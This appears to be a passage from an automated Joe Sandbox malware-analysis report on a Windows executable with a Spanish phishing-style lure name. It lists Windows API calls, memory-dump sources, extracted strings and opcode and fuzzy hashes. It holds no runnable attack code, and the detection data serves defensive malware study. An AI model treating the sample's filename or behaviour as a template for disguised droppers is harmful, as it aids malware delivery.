                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsz2C67.tmp
                                                • API String ID: 2962429428-1475182038
                                                • Opcode ID: 876b688c588afe5773e64c7bbc1298244ac35c0ab5ac1cb34d6cbf52c35d91ec
                                                • Instruction ID: b4aeda79ce9169ff0691def1b455dd989f45c243b0b2f58971613af12f624ab5
                                                • Opcode Fuzzy Hash: 876b688c588afe5773e64c7bbc1298244ac35c0ab5ac1cb34d6cbf52c35d91ec
                                                • Instruction Fuzzy Hash: 07E02CB080070492C130AF3CAE4D8853A285F4133A720432BF038F20F0C7788AAB0EA9
                                                APIs
                                                • SetWindowTextW.USER32(00000000,00429240), ref: 00403DC9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: TextWindow
                                                • String ID: "C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe"$1033
                                                • API String ID: 530164218-1151515666
                                                • Opcode ID: 4e624a1c1286e3581cf7061528553f6c4fdbf51a086a865f3efb5b186a46be4c
                                                • Instruction ID: 03976cd0908ed948c9bf00cc325fcd7bd37552fd0e89046400bf063f4d175d83
                                                • Opcode Fuzzy Hash: 4e624a1c1286e3581cf7061528553f6c4fdbf51a086a865f3efb5b186a46be4c
                                                • Instruction Fuzzy Hash: 5D11D131B44210DBC734AF15DC80A377BADEF85715B2841BFE8016B3A1DB3A9D0386A9
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00405314
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405365
                                                  • Part of subcall function 00404322: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                • Instruction ID: 55ce392e6746b2cc60fd0279fd4fa9b35be9dafe7b92107a95c9794c7a372d77
                                                • Opcode Fuzzy Hash: 1c38682ff548693de77d02b4aeee144e7a7efb8abd51762e205331c359b10038
                                                • Instruction Fuzzy Hash: 8F01B1B2200708ABEF209F11DD80AAB3725EB80395F545036FE007A1D1C3BA8D929E6D
                                                APIs
                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe,C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe,80000000,00000003), ref: 00405C18
                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F41,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe,C:\Users\user\Desktop\CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.exe,80000000,00000003), ref: 00405C28
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CharPrevlstrlen
                                                • String ID: C:\Users\user\Desktop
                                                • API String ID: 2709904686-3370423016
                                                • Opcode ID: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                • Instruction ID: 7c763ee06e751a121eeaaae5fe0630bfdebb5bec0d299de236eb7caac3423831
                                                • Opcode Fuzzy Hash: 1e2f59ad4ff0707ecda417660e1f53ddee00da6e1af2314932cd9a88429354c1
                                                • Instruction Fuzzy Hash: BCD05EB2404A249ED322A704ED0499F67A8EF12300786886AE440A6165D7789C8186AD
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                • GlobalFree.KERNEL32(?), ref: 10001203
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2987306905.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2987274852.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2987339691.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2987366231.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                APIs
                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5C
                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D74
                                                • CharNextA.USER32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D85
                                                • lstrlenA.KERNEL32(00000000,?,00000000,0040602D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: lstrlen$CharNextlstrcmpi
                                                • String ID:
                                                • API String ID: 190613189-0
                                                • Opcode ID: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                • Instruction ID: 1f72a7e7db10584d46f5d47bab472a29a69204e410489cb336b3e0253d2e012c
                                                • Opcode Fuzzy Hash: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                • Instruction Fuzzy Hash: 31F09631104918FFC712DFA5DD0499FBBA8EF06350B2580BAE841F7251D674DE019F99
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553217482.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_110000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b675c07a09246e8b018efa90ad32a40d0ca9f2aef1e1c2368b9feda97a9624e6
                                                • Instruction ID: a892015aa9741191ecb10579fb8fe349a3f5d1fa9e8cc05c41c1c460cc460fb6
                                                • Opcode Fuzzy Hash: b675c07a09246e8b018efa90ad32a40d0ca9f2aef1e1c2368b9feda97a9624e6
                                                • Instruction Fuzzy Hash: AF63EA31D10B1A8ADB11EF68C950AD9F7B1FF99300F15C69AE45877221EB70AAD4CF81
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553217482.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_110000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 227b93a01f7e1e5e1714b757a818d060b16aaa24e3ba89a7b04ddd9d6e0e38a1
                                                • Instruction ID: 96d846f55a4450fa60d62eb83406965d5eee4a33a08538e61ec58119086aac29
                                                • Opcode Fuzzy Hash: 227b93a01f7e1e5e1714b757a818d060b16aaa24e3ba89a7b04ddd9d6e0e38a1
                                                • Instruction Fuzzy Hash: 31331C31D107198EDB15DF68C880AEDF7B1FF99300F15C6AAD458A7225EB70AAC5CB81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553217482.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_110000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \Vj
                                                • API String ID: 0-3251626932
                                                • Opcode ID: b0640f209226b534bbb5c963ac3b6163459d705dac0567f800cd941a64eaea2f
                                                • Instruction ID: 40580717a49d92ceb860473a6e32648f1b175493d6e735da061f12118e703cd0
                                                • Opcode Fuzzy Hash: b0640f209226b534bbb5c963ac3b6163459d705dac0567f800cd941a64eaea2f
                                                • Instruction Fuzzy Hash: 2F918C70E003099FDF18CFA9D8857EEBBF2AF88304F148539D415A7298EB749985CB95
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553217482.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_110000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8355254ea42eaa1e8ec13896b97d73c8759a5598ddef86932aced22024402438
                                                • Instruction ID: 3a0c314b8d7627436573696dc02e5b2daed596487d71f00a79478d07760cbb0d
                                                • Opcode Fuzzy Hash: 8355254ea42eaa1e8ec13896b97d73c8759a5598ddef86932aced22024402438
                                                • Instruction Fuzzy Hash: CAC20931D10B198ADB10EF68C950AE9F7B1FF99300F15D69AE45877221EB70AAD4CF81
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579877582.0000000038770000.00000040.00000800.00020000.00000000.sdmp, Offset: 38770000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38770000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0778073268f9436db79a926439e60a86fbb9c3b4ae8cfeffed7508afed15580c
                                                • Instruction ID: 85744ab1839b6bb610ea2dd4a3e544af3192b449c81e47cfbdbf318000442436
                                                • Opcode Fuzzy Hash: 0778073268f9436db79a926439e60a86fbb9c3b4ae8cfeffed7508afed15580c
                                                • Instruction Fuzzy Hash: A4624934B00204CFEB14DBA8C594AADBBF3EF89394F548469E405AB395DB75ED42CB90
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579877582.0000000038770000.00000040.00000800.00020000.00000000.sdmp, Offset: 38770000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38770000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b18175db1ed04337ceb05cf3d10319655abb30ecc381a22580a446b1bb2cb014
                                                • Instruction ID: d506f005408446fed6e59b1a5f156e2522f7f7c79d31226d60bcb69e7b20ffed
                                                • Opcode Fuzzy Hash: b18175db1ed04337ceb05cf3d10319655abb30ecc381a22580a446b1bb2cb014
                                                • Instruction Fuzzy Hash: 87324F34B002048FEB15DB68C894BADB7B3EF88351F608569E516EB355DB35DC82CB91
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579877582.0000000038770000.00000040.00000800.00020000.00000000.sdmp, Offset: 38770000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38770000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b3a790a29ca5a3a9296ba4ad5a764149eda7ca8dbbb8c4164c12d772ececf394
                                                • Instruction ID: f0951d9fcdd6065dc7b9a4b57c09467b0e13a5a53b716a185c790598737c3af8
                                                • Opcode Fuzzy Hash: b3a790a29ca5a3a9296ba4ad5a764149eda7ca8dbbb8c4164c12d772ececf394
                                                • Instruction Fuzzy Hash: 85222D74A01205CBFF14CAA8C4907ADB7A3EF89350F608529E459EF395DA36DC85CBA1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579877582.0000000038770000.00000040.00000800.00020000.00000000.sdmp, Offset: 38770000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38770000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0953d8b8c423753c895006d5f09858d3ac524e84bab72692c9f464b744f02c43
                                                • Instruction ID: f345bea07946dbcdaf10d7ab740c5c9a30724447a4c1bfb6c3e637e62e456641
                                                • Opcode Fuzzy Hash: 0953d8b8c423753c895006d5f09858d3ac524e84bab72692c9f464b744f02c43
                                                • Instruction Fuzzy Hash: A6324134E10719CFDB15DF75C85059DB7B2BF99300F50C6AAE459AB221EB30AA86CF90
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553217482.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_110000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e5eff02fbd873017b16087f18f2f6cb09e36bc0819112a3e90cadc2a0abef372
                                                • Instruction ID: d5fd70e91a3aac7652bdabb32820c5d4ffb6774f5241ec22d980238adc4ecaa6
                                                • Opcode Fuzzy Hash: e5eff02fbd873017b16087f18f2f6cb09e36bc0819112a3e90cadc2a0abef372
                                                • Instruction Fuzzy Hash: 6CB14070E003098FDB18CFA9D9857EEBBF2AF88714F248539D415EB254EB749885CB85
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579955134.0000000038850000.00000040.00000800.00020000.00000000.sdmp, Offset: 38850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38850000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3b6c18a251cfac627c8485c795d5317cd8667a8a2ddcec96f04e4ef44146e6b2
                                                • Instruction ID: 835e03b91fe85e34ea39faa3dcf25f936af24c893e41ed0007d01f5b5e360e67
                                                • Opcode Fuzzy Hash: 3b6c18a251cfac627c8485c795d5317cd8667a8a2ddcec96f04e4ef44146e6b2
                                                • Instruction Fuzzy Hash: 31816234B003199FEB0DAFB9989576E7AB7BFC8300B14852ED442E7398DE35D8028795
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553217482.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_110000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \Vj$\Vj
                                                • API String ID: 0-936211472
                                                • Opcode ID: 4ab9e915eb6387cf44af4c33b984b21d7b3340e3cc10ff59bdc3fda47f490400
                                                • Instruction ID: f15a8728bb6fcbcc7e0cc01a0a6b3b7a70af134bd7f95eed62fbe85bcc0fa8c7
                                                • Opcode Fuzzy Hash: 4ab9e915eb6387cf44af4c33b984b21d7b3340e3cc10ff59bdc3fda47f490400
                                                • Instruction Fuzzy Hash: 09716970E003499FDF18CFA9C8857DEBBF2AF88B14F148539D415AB294EB749881CB95
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553217482.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_110000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \Vj$\Vj
                                                • API String ID: 0-936211472
                                                • Opcode ID: 88fbf6155b4ab64098f204e8b2eeb1b2a605186817caea51f01bd644851fb696
                                                • Instruction ID: 68f93640bbdbf3853491d91e89a264f5b9c7fa16de36bcddf2e8a3050e8ec8dc
                                                • Opcode Fuzzy Hash: 88fbf6155b4ab64098f204e8b2eeb1b2a605186817caea51f01bd644851fb696
                                                • Instruction Fuzzy Hash: 4E716970E003499FDB18CFA9C8857DEBBF2AF88714F148539D415AB294EB749881CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553217482.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_110000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ]
                                                • API String ID: 0-3352871620
                                                • Opcode ID: d92c0de9eedfdf73e4e5d0786ccd18ea8ddfbb26a603a97b619c5fc3ac032236
                                                • Instruction ID: cf760696e53bcc124a30633fe7b9197cc18867937581ff4c086c554216c1551a
                                                • Opcode Fuzzy Hash: d92c0de9eedfdf73e4e5d0786ccd18ea8ddfbb26a603a97b619c5fc3ac032236
                                                • Instruction Fuzzy Hash: 0F026F74A042048FDB18DBA8D9946EDBBB2EF89310F248579D805EB395DF35DC82CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579955134.0000000038850000.00000040.00000800.00020000.00000000.sdmp, Offset: 38850000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38850000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: PJOq
                                                • API String ID: 0-3349662408
                                                • Opcode ID: f4869ef6d786d7ff4c6634b16d29c1837dbb1e54f639c51d98d1e870381acd5e
                                                • Instruction ID: 8d1a9fde5cf0f515ad072a6a0531bd6659795ae1fda454a84fb725526abc9771
                                                • Opcode Fuzzy Hash: f4869ef6d786d7ff4c6634b16d29c1837dbb1e54f639c51d98d1e870381acd5e
                                                • Instruction Fuzzy Hash: 5CE15D78A00318CFEB18DB68C490A9DB7B2FF89350F644569E416EB391CB75ED46CB81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579877582.0000000038770000.00000040.00000800.00020000.00000000.sdmp, Offset: 38770000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38770000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (Js^HJ
                                                • API String ID: 0-3849574638
                                                • Opcode ID: 029756e5b9cdfe311d0d4c6280d7f7ccbfcd2325c55335ac36d967cc41ffca48
                                                • Instruction ID: 32eb8be622dd71fb1ecaeb4cbcc66390dc16675ce7322c5865336264d5839997
                                                • Opcode Fuzzy Hash: 029756e5b9cdfe311d0d4c6280d7f7ccbfcd2325c55335ac36d967cc41ffca48
                                                • Instruction Fuzzy Hash: FAE1A275A002188FEF14DFA4C880BAEBBB6FF45350F10456AE549EB281C735DD45CBA1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553217482.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_110000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \Vj
                                                • API String ID: 0-3251626932
                                                • Opcode ID: 82d1ea99e00530fd45f92cf02f7d39d84f11d1a80aa60c11d619239c56a5c307
                                                • Instruction ID: 2e2b84b66631ca9d9f4f28587a0c4f0f6d021f833dc08f55e0d9e8b8e4469722
                                                • Opcode Fuzzy Hash: 82d1ea99e00530fd45f92cf02f7d39d84f11d1a80aa60c11d619239c56a5c307
                                                • Instruction Fuzzy Hash: C3919C70E003499FDB18CFA9D8857DEBBF1AF48304F148539E415A7298EB749A85CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7553217482.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_110000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 5
                                                • API String ID: 0-2226203566
                                                • Opcode ID: a1a245b109b6fc8eafb5990aa782797e29bf6475f54303789ea50dcb8944874b
                                                • Instruction ID: a023a20dc785fa8233e337f3ca9c362b3409ffe41775a4855d62efe272639aeb
                                                • Opcode Fuzzy Hash: a1a245b109b6fc8eafb5990aa782797e29bf6475f54303789ea50dcb8944874b
                                                • Instruction Fuzzy Hash: 9C718031F002199BDB19DFA9D850AEEBBB2AF88700F14452EE405A7381DF30AD468B95
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579877582.0000000038770000.00000040.00000800.00020000.00000000.sdmp, Offset: 38770000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38770000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: |
                                                • API String ID: 0-2343686810
                                                • Opcode ID: df1f36afaac466c736a14cff3af5b39a2e34a0c7d68d490052113bebe7fb57dc
                                                • Instruction ID: 83dc46a12280e027f885689de71e7bb7293bdc13288999628b123288dbc9f24d
                                                • Opcode Fuzzy Hash: df1f36afaac466c736a14cff3af5b39a2e34a0c7d68d490052113bebe7fb57dc
                                                • Instruction Fuzzy Hash: 75115B74F042249FDB54DB78C908BAE7BF6AF48740F108469E51AEB3A0DB759801CB94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579877582.0000000038770000.00000040.00000800.00020000.00000000.sdmp, Offset: 38770000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38770000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: |
                                                • API String ID: 0-2343686810
                                                • Opcode ID: 33c9defa83a5db75e16b70caa596b81d569814201f1b714c340d26a70e4a2842
                                                • Instruction ID: 4769587e82c46eaae93eb7fd284a0a2e8dc6d1e7d661b0b2ede868eae8877043
                                                • Opcode Fuzzy Hash: 33c9defa83a5db75e16b70caa596b81d569814201f1b714c340d26a70e4a2842
                                                • Instruction Fuzzy Hash: 5B118B71F002219FDB54DB78D904BAE7BF2AF4C740F108469E51AEB3A4EB7598018B94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.7579877582.0000000038770000.00000040.00000800.00020000.00000000.sdmp, Offset: 38770000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_38770000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: |
                                                • API String ID: 0-2343686810
                                                • Opcode ID: 526a9871e377e05a5add7611a51645f7cd7462d39d55317befc73644fa43fd14
                                                • Instruction ID: efb1b232deeba7f9cbd4e9fc370b5b85977e379219f1ec9f4ab480e1c2e29386
                                                • Opcode Fuzzy Hash: 526a9871e377e05a5add7611a51645f7cd7462d39d55317befc73644fa43fd14
